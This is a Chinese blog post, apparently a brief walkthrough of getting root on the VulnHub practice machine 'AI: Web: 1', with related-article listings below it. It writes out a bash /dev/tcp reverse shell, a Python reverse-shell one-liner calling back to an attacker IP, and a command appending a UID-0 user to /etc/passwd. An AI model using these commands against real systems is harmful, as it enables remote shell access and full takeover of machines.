AI:web1提权

最新推荐文章于 2024-04-29 16:23:21 发布
最新推荐文章于 2024-04-29 16:23:21 发布
阅读量296 收藏 1
点赞数
分类专栏: AI:web1 kali linux 提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39742838/article/details/103460582
版权
AI:web1 同时被 3 个专栏收录
1 篇文章 0 订阅
订阅专栏
kali linux
1 篇文章 0 订阅
订阅专栏
提权
1 篇文章 0 订阅
订阅专栏

1.AI:web1前期端口扫描和sql注入不再提了,教程也有很多,直接说提权。

2.傻傻的上传了一个php文件,想要反弹shell,bash -i >& /dev/tcp/192.168.133.128/4444 0>&1,监听4444端口,访问这个php文件,结果并没有结果,一定是姿势不对。

3.监听4444端口

在kali os-shell执行

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.133.128',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

这个时候在监听4444端口的页面就会拿到权限

 

ls看一下

执行命令openssl passwd -1 -salt test1 1234,得到一个密码$1$test1$SENHNrz/jlDWA4lWveQUs/

执行命令直接添加一个root用户:echo 'test1:$1$test1$SENHNrz/jlDWA4lWveQUs/:0:0::/root:/bin/bash' >>/etc/passwd

开启虚拟终端:python -c 'import pty; pty.spawn("/bin/bash")'

切换用户:su test1

输入密码,搞定,其他方法再试一试。

vvhaly
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机渗透之 AI: Web: 1
_Co1a
07-21 1024
靶机下载地址:AI:Web:1 Description: Difficulty: Intermediate Network: DHCP (Automatically assign) Network Mode: NAT This box is designed to test skills of penetration tester. The goal is simple. Get flag from /root/flag.txt. Enumerate the box, get low privi
AI:WEB:1 Walkthrough
weixin_30470643的博客
09-26 312
AI: Web: 1 Vulnhub Walkthrough靶机下载:https://www.vulnhub.com/entry/ai-web-1,353/测试方法: Nmap网络扫描 浏览网页 爆破目录 SQL注入获取凭证 SQL注入获取shell 可写/etc/passwd 读取falg文件靶机和攻击机处于统一网段下 所以就不用net...
升第一天-简单Web升&转移(1)
最新发布
2401_83621426的博客
04-29 527
16、mysql的innodb如何定位锁问题,mysql如何减少主从复制延迟?2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?6、Squid、Varinsh和Nginx有什么区别,工作中你怎么选择?5、LVS、Nginx、HAproxy有什么区别?9、讲述一下Tomcat8005、8009、8080三个端口的含义?7、Tomcat和Resin有什么区别,工作中你怎么选择?使用目录扫描工具,扫出一个admin的路径,访问为后台。3、现在给你三百台服务器,你怎么对他们进行管理?
AI-WEB-1.0超详细多方法教程
qq_61988806的博客
10-19 2624
AI-WEB-1.0 多方法渗透
AI-Web-1.0(vulnhub)
2201_75667984的博客
12-05 36
se3reTdir777/uploads/绝对路径为:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/回想到m3diNf0下的info.php中的泄露文件还有一个为泄露的/se3reTdir777/uploads/目录。通过查看m3diNf0下的info.php知道/se3reTdir777/uploads/绝对路径。使用--file--write写入目标位置改名1.php。右击靶机->设置->网络适配器->高级->MAC地址。
CTF-常见的几种web方法
Reaches_r的博客
08-10 1361
1.内核漏洞 2.明文密码暴力破解3.计划任务 4.密码复用 5.利用zip、tar
解决php的时候因系统禁用函数导致无法执行命令的情况.zip
01-18
软件开发设计:PHP、应用...云计算与大数据:数据集、包括云计算平台、大数据分析、人工智能、机器学习等,云计算是一种基于互联网的计算方式,通过这种方式,共享的软硬件资源和信息可以按需供给计算机和其他设备。
pythageek_web
03-27
在535 AC大街上保留了全部运输,并从filósofomatemáticoPitágorasque naquelaépocaestava pensando em largar tudo e desistir de seu trabalho处获得了赔偿。 交给其他人的消息,发送给我的通缉令,发送给...
图腾:分散的操作系统
02-03
此外,它允许您根据自己的条件将这些数据与人工智能或简单程序一起使用,以使您的数字生活更加舒适,而不会损害您的隐私。 为了实现这一目标,Vinyai基于诸如区块链(Ethereum)和IPFS等去中心化技术。 所有软件...
Browse AI Recorder-crx插件
03-29
Superpowers Browse AI将为您供:-汇总任何网站上的数据-监控网站中的更改-自动化网络上的任何内容-为没有公共API的网站制作API使用此扩展程序,即表示您同意我们的服务条款(可通过侧栏的“隐私政策”链接获得...
华硕Z10PC-D8 SAS用户手册 C13694_Z10PC-D8_Series_V3_WEB
08-19
* 特殊功能:华硕独家的研究开发功能,包括AI Suite III、USB 3.0、SAS、Raid等 二、硬件设备信息 * 主板安装前:需要了解主板的安装要求和注意事项 * 硬件设备信息:包括处理器、内存、存储器、扩展槽、USB接口等...
15.CTF-web安全
woo233的博客
09-29 1783
往往我们能拿下服务器的web服务只是具有低限用户(www-data),对于内网渗透,我们需要到root。Linux系统的过程不止涉及到了漏洞,也涉及了很多系统配置。:已经拿到低shell被入侵的机器上面有nc,python,perl等linux非常常见的工具有限上传文件和下载文件。
AI: Web: 1靶机-Walkthrough
ins1ght的博客
09-21 5684
AI: Web: 1靶机,中等难度。使用sqlmap进行webshell的上传,感觉个人的思路稍微有点乱,但这篇文章会让你有观看“现场直播”的感觉,我踩过的坑、犯的低级错误、我的选择,你都可以看到。我觉得一篇好的walkthrough不光应该让人看到“修葺”过的完美思路,使用的技术手段,还应该让人看到我犯过的错,我的选择过程。PS:信息收集是王道。Enjoy!!!
AIweb1靶场总结
胖虎的博客
11-03 458
aiweb1靶场总结
升第一天-简单Web升&转移
weixin_39953838的博客
12-26 422
你能成功,却不了你在她心里的位置。
VulnHub AI-Web 1.0 靶机渗透
weixin_45908624的博客
12-29 992
vulnhub ai-web1.0
AI-Web-1.0靶场
qq_46187131的博客
03-27 1190
1.确认靶机IP 2.端口和目录扫描 3.使用SQLmap进行注入获取shell 4.使用openssl
web
qq_40495877的博客
04-29 2036
这里利用冰蝎远程连接到了靶机上: 利用systeminfo查看靶机系统的补丁; 如果有限可以在靶机上创建txt文件保存,在用冰蝎下载下来,没有的话就复制粘贴到本地txt文件。 然后就利用本机下载的wesng去对比补丁库吧,命令如下: wesng目录下: python wes.py systeminfo.txt -o vuln.csv 对比结果保存为vuln.csv文件: 这里我们就有可利用的补丁漏洞了; 接下来用linux或者忍者系统去创建一个远程木马 命令行下: msfvenom -
AI-WEB-1.0靶机教程
qq_42553928的博客
04-06 6159
文章目录靶机概况下载地址靶机描述Description靶机信息靶机界面网卡信息信息收集主机发现端口扫描命令过程端口详情网站信息网站首页目录爆破敏感目录扫描m3diNf0目录se3reTdir777目录漏洞映射SQLI渗透过程SQLI漏洞利用查看我是谁创建一个名为webshell.php的文件下载文件到靶机运行上传的文件 靶机概况 下载地址 https://www.vulnhub.com/entry/ai-web-1,353/ 靶机描述 Description Difficulty: Intermedi
ai人工智能:发展简史+技术案例+商业应用 电子书下载
11-11
AI(人工智能)是一种涉及计算机科学的科技领域,旨在...总之,AI人工智能的发展经历了多个阶段,并逐渐成为一种具有广泛影响力的关键技术。随着科技的不断进步和创新,AI有望继续发展,并为人类带来更多的便利和机会。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值